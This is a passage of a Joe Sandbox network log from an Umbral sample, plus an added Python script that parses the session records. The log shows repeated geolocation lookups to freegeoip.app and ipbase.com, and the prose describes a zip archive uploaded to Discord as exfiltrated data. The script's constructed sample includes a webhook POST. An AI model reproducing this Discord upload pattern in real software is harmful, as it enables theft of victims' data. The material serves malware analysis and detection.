                                      2024-09-06 23:48:47 UTC | 633               | IN        | Data Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:47 UTC | 1369              | IN        | Data Raw: 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20
                                      Data Ascii: g: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height:
                                      2024-09-06 23:48:47 UTC | 1087              | IN        | Data Raw: 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.4329
                                      2024-09-06 23:48:47 UTC | 5                 | IN        | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


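Read together, these sessions record two behaviours of the sample. The Discord API answers an upload with a JSON attachment record (Umbral-927537.zip, 464781 bytes, hosted on cdn.discordapp.com), which is the collected data leaving the machine, and the sample requests /xml/ from freegeoip.app every few seconds, is redirected to https://ipbase.com/xml/ and receives a 404 there, so its geolocation lookup never succeeds and it keeps retrying. The Python below is an added example written for this page; it is not code from the Joe Sandbox report or from the malware. It parses session records in the fused form shown here, recovers the run-together columns, and reports the attachment exfiltration and the geolocation beacon with its outcome. The sample input is constructed from the sessions above; session number 46, its POST request line and the placeholder destination 203.0.113.10 are assumptions, because the request half of the Discord session is not on this page.

```python
"""Triage of flattened Joe Sandbox HTTP session dumps (added example, not report code).
Extraction fuses the table columns ("47192.168.2.549788188.114.97.3443"); the fields are
recovered by enumerating every legal split of the digit runs and scoring the candidates."""
import ipaddress, itertools, json, re

SESSION_HDR = "Session IDSource IPSource PortDestination IPDestination Port"
ROW_RE = re.compile(r"^\d{4}-\d\d-\d\d \d\d:\d\d:\d\d UTC(\d+)(IN|OUT)(.*)$")
HEADER_RE = re.compile(r"^([A-Za-z0-9-]+): ?(.*)$")
ATTACH_RE = re.compile(r'"filename":"([^"]+)","size":(\d+),"url":"([^"]+)"')
GEOIP_HOSTS = {"freegeoip.app", "ipbase.com", "ip-api.com", "ipinfo.io"}
# Constructed sample modelled on the sessions above; session 46, its POST line and the
# placeholder destination 203.0.113.10 are assumptions (that request is not on the page).
SAMPLE = """\
Session IDSource IPSource PortDestination IPDestination Port
46192.168.2.549785203.0.113.10443
TimestampBytes transferredDirectionData
2024-09-06 23:48:32 UTC16355OUTPOST /api/webhooks/REDACTED HTTP/1.1
Host: discord.com
2024-09-06 23:48:33 UTC1369INHTTP/1.1 200 OK
Content-Type: application/json
40b
{"type":0,"content":"","attachments":[{"id":"1281762999476158464","filename":"Umbral-927537.zip","size":464781,"url":"https://cdn.discordapp.com/attachments/1277266726186385433/1281762999476158464/Umbral-927537.zip?ex=66dce651&is=66db94d1&hm=6b8f17ebb81cdcc853fb8f1ea20550c92755170750e746e85ea8f96307148391&","proxy_url":"https://media.discordapp.net/attachments/1277266726186385433/12817629994761

Session IDSource IPSource PortDestination IPDestination Port
47192.168.2.549788188.114.97.3443
TimestampBytes transferredDirectionData
2024-09-06 23:48:32 UTC67OUTGET /xml/ HTTP/1.1
Host: freegeoip.app
2024-09-06 23:48:32 UTC645INHTTP/1.1 301 Moved Permanently
Location: https://ipbase.com/xml/
2024-09-06 23:48:32 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a
"""


def _octet(s):
    return len(s) <= 3 and (s == "0" or s[0] != "0") and int(s) <= 255


def _cuts(s, n):  # every way to cut digit string s into n non-empty pieces
    for idx in itertools.combinations(range(1, len(s)), n - 1):
        b = (0, *idx, len(s))
        yield tuple(s[b[i]:b[i + 1]] for i in range(n))


def _score(c):  # private source IP, Windows ephemeral source port, web destination port
    return 3 * ipaddress.ip_address(c[1]).is_private + 2 * (c[2] >= 49152) + 2 * (c[4] in (80, 443))


def parse_session_line(line):
    """'47192.168.2.549788188.114.97.3443' -> (47, '192.168.2.5', 49788, '188.114.97.3', 443).
    The fused text is ambiguous ('192.168.2.54' with port 9788 is also legal): the best-scoring
    legal split wins; None if there is none."""
    p = line.strip().split(".")
    if len(p) != 7 or not all(x.isdigit() for x in p):
        raise ValueError(f"not a fused session line: {line!r}")
    cands = []
    for (sid, a1), (a4, sport, b1), (b4, dport) in itertools.product(
            _cuts(p[0], 2), _cuts(p[3], 3), _cuts(p[6], 2)):
        octs = (a1, p[1], p[2], a4, b1, p[4], p[5], b4)
        if all(map(_octet, octs)) and all(x[0] != "0" and int(x) <= 65535 for x in (sport, dport)):
            cands.append((int(sid), ".".join(octs[:4]), int(sport), ".".join(octs[4:]), int(dport)))
    return max(cands, key=_score, default=None)   # max() keeps the first of equal scores


def parse_sessions(text):
    """Dump text -> [{sid, src, sport, dst, dport, exchanges: [{dir, first, headers, body}]}]."""
    sessions, ex, in_body = [], None, False
    lines = iter(l.strip() for l in text.splitlines())
    for line in lines:
        if line == SESSION_HDR:                           # next row carries the fused values
            sid, src, sport, dst, dport = parse_session_line(next(lines))
            sessions.append(dict(sid=sid, src=src, sport=sport, dst=dst, dport=dport, exchanges=[]))
        elif not sessions or not line or line.startswith("Timestamp"):
            continue                                      # column header row or blank separator
        elif (m := ROW_RE.match(line)):                   # request/response line or a Data Raw chunk
            ex = dict(dir=m.group(2), first=m.group(3), headers={}, body=[])
            sessions[-1]["exchanges"].append(ex)
            in_body = ex["first"].startswith("Data Raw")
        elif ex is not None:
            h = HEADER_RE.match(line)
            if h and not in_body:
                ex["headers"][h.group(1).lower()] = h.group(2)
            else:
                in_body = True                            # first non-header line starts the body
                ex["body"].append(line)
    return sessions


def extract_attachments(body):
    """Attachment records in a Discord API response body. Chunk-size lines ('40b') are dropped;
    a truncated JSON, as in the dump above, falls back to a regex over the raw text."""
    text = "\n".join(l for l in body.splitlines() if not re.fullmatch(r"[0-9a-fA-F]+", l))
    try:
        atts = json.loads(text[text.index("{"):])["attachments"]
    except (ValueError, KeyError, TypeError):
        atts = [dict(filename=f, size=s, url=u) for f, s, u in ATTACH_RE.findall(text)]
    return [dict(filename=a["filename"], size=int(a["size"]), url=a["url"].split("?")[0]) for a in atts]


def triage(text):
    """Flag attachment uploads (exfil) and geolocation beacons, each with its outcome."""
    exfil, geoip = [], []
    for s in parse_sessions(text):
        ins = [e for e in s["exchanges"] if e["dir"] == "IN"]
        host = next((e["headers"]["host"] for e in s["exchanges"] if e["dir"] == "OUT" and "host" in e["headers"]), None)
        status = next((int(e["first"].split()[1]) for e in ins if e["first"].startswith("HTTP/")), None)
        for a in extract_attachments("\n".join(l for e in ins for l in [e["first"]] + e["body"])):
            exfil.append(dict(session=s["sid"], host=host, dst=s["dst"], **a))
        if host in GEOIP_HOSTS:
            redirect = next((e["headers"]["location"] for e in ins if "location" in e["headers"]), None)
            geoip.append(dict(session=s["sid"], host=host, status=status, redirect=redirect))
    return dict(exfil=exfil, geoip=geoip, geoip_resolved=any(g["status"] == 200 for g in geoip))
```

The column recovery is the part that needs care: "192.168.2.549788188" can be cut as 192.168.2.5 with port 49788 or as 192.168.2.54 with port 9788, and both are syntactically valid, so parse_session_line scores every legal split (private source address, Windows ephemeral source port, port 80 or 443 destination) rather than taking the first regex match. The Discord JSON on this page is cut off mid-record, which is why extract_attachments tries json.loads first and falls back to a regex; on a complete body the JSON path is used. Running triage(SAMPLE) reports the Umbral-927537.zip upload in session 46 and the freegeoip.app beacon in session 47 redirected to ipbase.com, with geoip_resolved False.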
                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port
                                      54         | 192.168.2.5 | 49808       | 188.114.97.3   | 443
                                      Timestamp               | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:49 UTC | 67                | OUT       | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:49 UTC | 639               | IN        | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:49 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:49 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=POFqURfHR92Gx%2FHbivBY8kcLJq27Slu11HxEUdfrnT1W58JuhPYapNXEAOGcK5Cnf4rKfAWsW27ZqS85iakKvFPuzIQjv%2FCEQVWe%2F6SSN1WYHsHh7wXmnIAkVLKU7Lhw"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25a1f4a7a43a4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:49 UTC | 167               | IN        | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port
                                      55         | 192.168.2.5 | 49809       | 104.21.85.189  | 443
                                      Timestamp               | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:49 UTC | 64                | OUT       | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:50 UTC | 733               | IN        | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:49 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 19283
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VV4FTY92EP4BGKDEW27XR
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5UDdTmFlZmMAt7LXKvFqcrF8SKGsaosrWXlZWTCYkx9RjJN8jk8O78%2FkTaA9qlJr7eiPOzPe%2F87svJtHKwYI7baSVBG5wcrWV9AdcTw44YSVHXe1PC2JXZmM4TYQ"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25a230fabc466-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:50 UTC636INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:50 UTC1369INData Raw: 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30
                                      Data Ascii: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100
                                      2024-09-06 23:48:50 UTC1084INData Raw: 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34 39 33
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.4329493
                                      2024-09-06 23:48:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


Session ID: 56 | Source IP: 192.168.2.5 | Source Port: 49813 | Destination IP: 104.21.85.189 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-09-06 23:48:54 UTC | 64 | OUT | GET /xml/ HTTP/1.1
Host: ipbase.com
Connection: Keep-Alive
2024-09-06 23:48:54 UTC | 745 | IN | HTTP/1.1 404 Not Found
Date: Fri, 06 Sep 2024 23:48:54 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Age: 19288
Cache-Control: public,max-age=0,must-revalidate
Cache-Status: "Netlify Edge"; hit
Vary: Accept-Encoding
X-Nf-Request-Id: 01J74VV95PGB6QJJK8G04N4G00
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QGaO3PrubpmaYJ7uKjKJNOhaAauE%2BFEn2tUih6gNRBldnrJ5W01YBQUvUrFkSAfEwC%2BbCNwPpJM%2BkPxYAAXvWR%2FPLx8%2F1BeJwSksN%2BUh%2B%2Fap8BJ5p8w6jCLwIDJ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bf25a40fbd541e9-EWR
alt-svc: h3=":443"; ma=86400
2024-09-06 23:48:54 UTC | 624 | IN | Data Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
2024-09-06 23:48:54 UTC | 1369 | IN | Data Raw: 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20
Data Ascii: padding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center;
2024-09-06 23:48:54 UTC | 1096 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35
Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.242085
2024-09-06 23:48:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 57 | Source IP: 192.168.2.5 | Source Port: 49817 | Destination IP: 104.21.85.189 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-09-06 23:48:58 UTC | 64 | OUT | GET /xml/ HTTP/1.1
Host: ipbase.com
Connection: Keep-Alive
2024-09-06 23:48:58 UTC | 740 | IN | HTTP/1.1 404 Not Found
Date: Fri, 06 Sep 2024 23:48:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Age: 7939
Cache-Control: public,max-age=0,must-revalidate
Cache-Status: "Netlify Edge"; hit
Vary: Accept-Encoding
X-Nf-Request-Id: 01J74VVD7KPNRD8RQ62YJBMSPR
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NhMnhnRZoWX7gt9qavAxJfKor8Dly6ty3%2Fv%2BnjPyphmcmKstsM8YXuJiPDhIczPU7ARbijNcsdln3ZIU%2FgMo%2B0j%2BJOJWrdRpK9oyCpsbsQmsptQovwUYH8%2BaSVPp"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bf25a5afdc642a5-EWR
alt-svc: h3=":443"; ma=86400
2024-09-06 23:48:58 UTC | 629 | IN | Data Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
2024-09-06 23:48:58 UTC | 1369 | IN | Data Raw: 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67
Data Ascii: dding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; heig
